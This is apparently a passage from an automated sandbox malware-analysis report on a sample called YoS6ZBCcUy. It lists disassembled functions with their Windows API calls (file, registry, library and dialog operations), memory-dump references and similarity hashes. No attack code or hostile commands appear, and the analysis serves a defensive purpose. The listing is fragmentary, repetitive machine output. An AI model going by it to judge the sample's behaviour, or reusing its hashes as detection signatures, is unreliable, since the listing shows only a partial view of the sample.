                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                              • Opcode ID: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                              • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                              Function 00403915 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,004DF000,00000000,74DF3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1100898210-0
                                                                                                                                                                                              • Opcode ID: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                              • Instruction ID: 228f896298dd83b048f64e6024dd5859bf02c68f9830d759f3998b57695c5827
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                              • Instruction Fuzzy Hash: 12E0C2334122205BC6215F04ED08B5A776CAF49B32F15407AFA807B2A087B81C928FC8
                                                                                                                                                                                              Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                              Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                              • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                                                              Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403382,004DF000,004DF000,004DF000,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                              • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                              Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                              • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                              Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00428200,?,00428200,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                              • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                              Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                              • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                              Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Remove folder: ,?), ref: 0040614B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                              • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                              Function 00404231 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040424B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemText
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                                                              • Opcode ID: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                              • Instruction ID: 58c8b0ee816a9f079cb4560b894257bfb9dfa06490f5d5235509ae25e2c95a64
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                              • Instruction Fuzzy Hash: 79C04C76148300BFD681BB55CC42F1FB79DEF94315F44C52EB59CA11E2C63A84309B26
                                                                                                                                                                                              Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              • Opcode ID: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                              • Instruction ID: 539d97cecbd0a6245bb22c05259f77f590d4a0b0d5c0f28d123e3a53dcb21da8
                                                                                                                                                                                              • Opcode Fuzzy Hash: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6C09BB27403007BDE11CB909E49F1777545790740F18447DB348F51E0D6B4D490D61C
                                                                                                                                                                                              Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
